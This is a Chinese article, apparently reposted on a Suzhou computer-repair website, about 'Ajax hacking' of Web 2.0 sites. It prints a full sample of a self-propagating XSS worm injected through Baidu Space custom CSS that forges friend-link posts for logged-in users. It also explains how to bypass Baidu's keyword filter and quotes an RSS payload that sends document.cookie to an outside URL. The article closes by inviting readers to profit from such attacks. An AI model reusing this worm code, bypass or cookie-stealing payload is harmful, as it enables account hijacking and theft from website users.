苏州电脑上门维修,苏州上门重装系统,苏州电脑维修

电话:18913547119 苏州电脑维修|苏州上门维修电脑|苏州上门装系统|苏州上门重装windows7系统|苏州网站建设

Baidu
请您留言 | 驱动下载 | 设为首页 | 加入收藏
  网站首页   苏州电脑维修    电脑数据恢复备份     苏州上门装系统    苏州网站建设    苏州打印机维修    在线留言    维修博客    联系我们 
苏州园区上门修网络
苏州新区上门修网线
新区科技城布网线
吴中区修网线
相城区设置无线路由器
今天是-
 
点我聊天
点我询价
微信号13814852280
 
您当前位置:网站首页 >> 苏州沧浪区上门维修 >> 葑门上门修理电脑 >> 阅读文章
站内查找:

Web2.0网站攻击新潮—Ajax Hacking

电话:15062333206 苏州所有地区上门服务,修不好,不收费
点击QQ咨询: ---QQ咨询:点击这里给我发消息
来源:互联网 发布时间:2009-05-01 00:20:36 查看次数:

由此Ajax攻击可见一斑,然而这还仅仅是个开始。7月份百度开通了百度空间,虽然没有指明是应用web2.0技术,但从web2.0象征的测试版(beta)和页面模版架构等等,你可以看出它事实上已经应用了Ajax技术。而在空间开通不到半个月,相应的攻击方式又产生了,这个攻击应该又算是一个蠕虫吧。它利用百度提交的自定义css(Cascading Stylesheet,层叠样式表单)中对插入的javascript过滤不严格,而使攻击者可以写入恶意代码进行了xss(Cross Site Scripting)跨站。从而使浏览该空间的百度通行证用户在不知觉的情况下将该站点加入自己的友情连接中。最原始代码标本如下:

  1. #header{height:89px;background:url("javascript:document.body.onload = function(){ //- - 在css的样式标签中插入javascript代码  
  2. var req = null;  
  3. if(window.XMLHttpRequest) req = new XMLHttpRequest(); //- - 这句懂ajax的都知道,是它的核心XMLHttpRequest,而下面当然是必不可少的判断是否IE的语句了。  
  4. else if(window.ActiveXObject){  
  5. var msxml = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP');  
  6. for(var i=0;i   
  7. try{req.overrideMimeType('text/xml')}catch(e){}  
  8. }  
  9. req.open('get','.',false);  
  10. req.send();  
  11. var s=req.responseText;  
  12. p=s.indexOf('passport.baidu.com/?logout');  
  13. if(p>0)  
  14. {  
  15. p=s.indexOf('');  
  16. if(p>0)  
  17. {  
  18. p=s.indexof('/',p);  
  19. p2=s.indexOf(String.fromCharCode(34),p);  
  20. var user=s.substring(p+1,p2);  
  21. var name='Here is a bad site';  
  22. var link='目标网址';  
  23. var desc='This link was added by an XSS script';  
  24. var url='/'+user+'/commit';  
  25. var data='ct=6&cm=1&spRef='+escape('http://hi.baidu.com/'+user)+'%2Fmodify%2Fbuddylink%2F0&spBuddyName='+escape(name)+'&spBuddyURL='+escape(link)+'&spBuddyIntro='+escape(desc); //- - 这句是整个蠕虫的执行语句,也是Ajax的数据异步调用语句。  
  26. req.open('post',url,false);  
  27. req.send(data);  
  28. alert('A friend link has been added to your space at http://hi.baidu.com/' +user);  
  29. }  
  30. }  
  31. else{alert('You are not a logged Baidu user.');} //- - 由于是标本语句,所以这里有对是否登陆的判断,但实际攻击中当然不会有。  
  32. }");  

当时百度在第一时间内对此蠕虫作出了反映——过滤提交表单中的javascript,当然这也使正常用户无法再在blog中贴入Flash动画。但后来的变种使得境况变得更糟糕,因为有人发现百度仅仅是过滤了CSS文本中的譬如"javascript"和"expression"这样的字符串。也就是说如果把”javascript”分成两行来写,就可以绕过百度的过滤但同时又被IE执行。而这时变种的蠕虫也随之产生,其造成的结果是在用户的css中加入如下代码:

#header { ……

很简单的一句吧,这几乎把该蠕虫提升到了病毒性质,因为用户本身无法到达css修改页面来修复他的css代码。事实上直到写这篇文章时,百度空间尚没有对一些另类的插入恶意代码方式进行有效地过滤和封锁。

如果认为他们所造成的影响都是局域的,那么我不得不带领大家来看一些影响比较广泛的最具有web2.0性质的——Rss(Really Simple Syndication)攻击。这是我从zdnet.com的Joris Evers的一篇名为“Blog feeds may carry security risk ”了解到的,大体意思是说由于目前几乎所有的不管是在线的还是离线的Rss阅读器都没有有效地对搀杂在Rss中的脚本进行过滤,导致攻击者可以向Rss中写入恶意的javascript代码,最终导致xss跨站,获取用户信息或其他。包括著名的Bloglines, RSS Reader, RSS Owl, Feed Demon, Sharp Reader都在攻击范围之内。这是去年yahoo rss xss代码:

  1. javascript: document.location='http://www.target.com/cookie.cgi?' +document cookie;   
  2. Should Steal Your Cookie.  
  3. Tue, 20 Sep 2005 23:55:18 EDT  
  4. javascript: alert(document.cookie);  
  5. Should Steal Your Cookie.  
  6. Tue, 20 Sep 2005 23:55:18 EDT  

事实上,最早的web2.0攻击出现在去年的myspace.上,有人在MySpace交友网站上写了一段JavaScript蠕虫代码,利用Ajax方法让无数的用户在不知情的情况下把他加入了好友名单,同时在他们的个人简介最后自动加上了“samy is my hero”的字样。此蠕虫被称为世界上第一个“web2.0蠕虫”。而从上文的对email、css、rss攻击进行的描述中你也可以看出目前对 web2.0的攻击利用亦是多方面的。但并不单单指跨站,网上有一篇《Hacking Ajax》的文章,其中有一句话被加了黑体,“By corrupting one of the dozens of data exchanges Ajax handles while loading a Web page, a hacker can take over control of the PC”,也就是说适当情况下,利用Ajax攻击并获得个人电脑管理权限亦是可能的。

由于目前系统对补丁的发布采取的都是时时更新功能,想通过溢出获得shell已经很难了,除非是0day的系统漏洞;而sql注入在网络也肆虐了几年,亦有了行之有效的防范方法;并且由于Python和Ruby语言的兴起,新的web2.0服务正在产生并有取代现有web结构趋势,譬如Plone。但不可改变的是web浏览器对xhtml和javascript的解释,只要我们始终有改变javascript的可能性,我们就永远有提升自己权限的可能……

那么对于日趋庞大的web2.0大军,你是否有兴趣从中分一杯羹呢?





·上一条:AJAX应用中使用TODO服务[ASP.NET]
·下一条:Ajax让网页木马“悄悄的执行”
相关文章
·Ajax是什么 2009-05-01 00:43:25
·Ajax 技术从入门到精髓 2009-05-01 00:40:32
·苏州沧浪区电脑维修 2009-09-21 13:59:16
·最基本的AJAX框架的实现方法 2009-05-01 00:38:02
·苏州十全街电脑上门维修系统重装 2009-08-31 08:45:47
·AJAX调用WCF服务项模板[ASP.NET] 2009-05-01 00:35:24
·AJAX的类库中使用服务接口定义[ASP.NET] 2009-05-01 00:34:14
·Ajax文本框输入提示 2009-05-01 00:31:29
文章评论
现在有0人对本文发表评论 查看所有评论
  最新更新
·苏州群星二村附近维修电脑的
·苏州工业园区星港街附近维修电脑星州街修网
·苏州东方大道好得家维修电脑
·苏州园金益新村维修电脑的群星苑安装系统
·苏州扬东路电脑维修跨塘重装系统
·苏州平江区齐门路竹之苑修电脑西北街重装系
·苏州带城桥路上门维修电脑南石皮弄玉器店修
·苏州东环创智赢家修无线路由器富华苑电脑维
·苏州哪种杀毒软件好
·苏州大学电脑上门维修重装系统
·葑门街道上门重装系统电脑维修
·苏州解放西路电脑上门维修
·苏州沧浪区电脑维修
·苏州桐泾公园电脑上门维修
·苏州银桥新村上门修电脑
  阅读排行
·苏州东环创智赢家修无线路由器富华苑电脑维
·Ajax 技术从入门到精髓
·Ajax让网页木马“悄悄的执行”
·Web2.0网站攻击新潮—Ajax Hacking
·AJAX调用WCF服务项模板[ASP.NET]
·最基本的AJAX框架的实现方法
·苏州工业园区星港街附近维修电脑星州街修网
·Ajax文本框输入提示
·AJAX的类库中使用服务接口定义[ASP.NET]
·Ajax是什么
·苏州桐泾公园电脑上门维修
·苏州盘门上门重装系统电脑维修
·苏州桐泾公园电脑维修上门重装系统
·苏州哪种杀毒软件好
·苏州十全街电脑上门维修系统重装
关于我们 | 关于我们 | 苏州网站建设 | 联系方式 | 数据恢复/备份 | 打印机故障 | 上门装系统 | 有事请留言 | 苏ICP备08101427号
联系邮箱:150795275@qq.com 在线QQ:150795275
Copyright 2017, 版权所有 www.zhongguolaobao.cn. SEEK114分类网站目录企业黄页